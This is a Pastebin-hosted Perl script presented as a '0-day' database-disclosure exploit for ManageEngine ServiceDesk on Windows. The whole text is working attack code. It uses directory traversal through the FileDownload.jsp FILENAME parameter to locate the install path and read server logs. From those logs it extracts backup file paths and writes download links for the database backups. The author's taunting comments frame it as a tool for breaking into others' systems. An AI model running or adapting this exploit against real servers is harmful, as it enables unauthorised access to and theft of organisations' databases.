Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use LWP::UserAgent;
- use File::stat;
- $ptxt="
- #################################################
- # _____ _ ____ _
- #| __|___ ___ _ _|_|___ ___| \ ___ ___| |_
- #|__ | -_| _| | | | _| -_| | | -_|_ -| '_|
- #|_____|___|_| \_/|_|___|___|____/|___|___|_,_|
- #
- #################################################
- [0-day] [Database disclosure]
- [desc: Exploit for ServiceDesk v *.* OS: Windows]
- ";
- print $ptxt;
- $ua=LWP::UserAgent->new();
- $url="http://127.0.0.1";
- $path="/workorder/FileDownload.jsp";
- $installPath=&getInstallPathWin($url,$path);
- if ($installPath ne "") {
- @backups=&getServerOutLogs($url,$path,$installPath);
- } else {
- print "Install path not found :(\n";
- exit();
- }
- if (scalar(@backups)>0) {
- print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n";
- foreach $backLine (@backups) {
- @backInfo=split(/ --- /,$backLine);
- #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
- &downloadBackups($url,$path,$backLine);
- }
- }
- unlink("bad");
- print "Dude, check out \'db_backups.html\'\n";
- sub downloadBackups {
- my ($url,$path,$backLine) = @_;
- @backInfo=split(/ --- /,$backLine);
- $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\$backInfo[0]$backInfo[1]";
- #$br=$ua->get($backupUrl);
- #if ($br->is_success) {
- # open(A,">$backInfo[1]");
- # print A $br->content;
- # close(A);
- #}
- open(A,">>db_backups.html");
- print A "<a href='$backupUrl'>$backInfo[1]</a><br>\n";
- close(A);
- }
- sub getServerOutLogs {
- my ($url,$path,$installPath) = @_;
- $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.txt";
- $br=$ua->get($badUrl);
- if ($br->is_success) {
- open(A,">bad");
- print A $br->content;
- close(A);
- }
- for ($i=0;$i<=10;$i++) {
- $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt";
- $br=$ua->get($logUrl);
- if ($br->is_success) {
- open(A,">${i}.txt");
- print A $br->content;
- close(A);
- if (stat("bad")->size!=stat("${i}.txt")->size) {
- } else {
- unlink("${i}.txt");
- }
- }
- }
- for ($i=0;$i<=10;$i++) {
- if (-e "${i}.txt") {
- open(A,"${i}.txt");
- @log=<A>;
- close(A);
- foreach $line (@log) {
- if ($line=~/: Build number(.*): ([0-9]+)\|/) {
- $tBuild=$2;
- if ($sdBuild eq "") {
- $sdBuild=$tBuild;
- }
- }
- if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9]+)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) {
- push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data");
- }
- }
- unlink("${i}.txt");
- }
- }
- if (scalar(@backups)>0) {
- print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n";
- } else {
- print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. No info about backups was found :(";
- exit();
- }
- foreach $mb (@backups) {
- $mb=~s/XBUILDX/$sdBuild/gi;
- @dir=split(/ --- /,$mb);
- print "Trash Dir: $dir[0]\n";
- print "Right Dir: ";
- chomp($rDir=<STDIN>);
- if ($rDir ne "") {
- $fullDB=$dir[1];
- $fullDB=~s/database/fullbackup/gi;
- push(@backupFiles,"$rDir --- $dir[1]");
- push(@backupFiles,"$rDir --- $fullDB");
- }
- }
- return @backupFiles;
- }
- sub getInstallPathWin {
- my ($url,$path) = @_;
- $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\";
- @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\");
- @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport.txt","bin\\run.bat","server\\default\\log\\boot.log");
- $i=0;
- foreach $p (@paths) {
- $k=0;
- foreach $f (@checkFiles) {
- $checkUrl="${url1}${p}${f}";
- $br=$ua->get($checkUrl);
- if ($br->is_success) {
- open(A,">${i}${k}");
- print A $br->content;
- close(A);
- }
- $k++;
- }
- $i++;
- }
- for ($i=0;$i<scalar(@paths);$i++) {
- $ok=0;
- for ($k=0;$k<scalar(@checkFiles);$k++) {
- if (-e "${i}${k}") {
- if ($k==0) {
- $incorrectSize=stat("${i}${k}")->size;
- } else {
- if (stat("${i}${k}")->size!=$incorrectSize) {
- $ok++;
- }
- }
- }
- }
- if ($ok>0) {
- if ($ok==4) {
- print "You are lucky! \nServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- } elsif ($ok>2) {
- print "I think ServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- } elsif ($ok>1) {
- print "You are lucky if ServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- }
- }
- }
- for ($i=0;$i<scalar(@paths);$i++) {
- for ($k=0;$k<scalar(@checkFiles);$k++) {
- unlink("${i}${k}");
- }
- }
- if ($ret eq "") {
- print "Bad luck man :\/\n";
- $ret=0;
- }
- return $ret;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement